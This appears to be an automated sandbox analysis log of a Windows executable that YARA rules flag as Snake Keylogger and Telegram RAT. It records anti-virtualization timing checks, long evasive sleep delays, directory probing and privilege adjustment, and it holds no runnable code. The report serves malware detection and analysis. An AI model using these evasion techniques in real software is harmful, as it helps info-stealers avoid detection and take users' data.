            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeAPI/Special instruction interceptor: Address: 1D9681D
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeRDTSC instruction interceptor: First address: 2DBEFB2 second address: 2DBEFB2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF2DCDB99F8h 0x00000006 inc ebp 0x00000007 test bl, dl 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeRDTSC instruction interceptor: First address: 1D6EFB2 second address: 1D6EFB2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF2DCFB3538h 0x00000006 inc ebp 0x00000007 test bl, dl 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeMemory allocated: 32D90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeMemory allocated: 32A80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594236Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeWindow / User API: threadDelayed 1659Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeWindow / User API: threadDelayed 8150Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd1568.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 3332Thread sleep count: 1659 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 3332Thread sleep count: 8150 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -599657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -598703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -598594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -598469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -598360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -598235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -597860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -597735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -596985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -596860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -596735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -596610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -596485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -596360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -594985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -594236s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe TID: 5024Thread sleep time: -593985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_0040646B FindFirstFileA,FindClose,4_2_0040646B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004058BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594236Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 594110Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 593985Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.00000000026D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2932166073.000000000272E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd4dbcb03dbc38<
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeAPI call chain: ExitProcess graph end nodegraph_0-4034
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeAPI call chain: ExitProcess graph end nodegraph_0-4200
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_6FC41A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FC41A98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeProcess created: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe "C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeQueries volume information: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
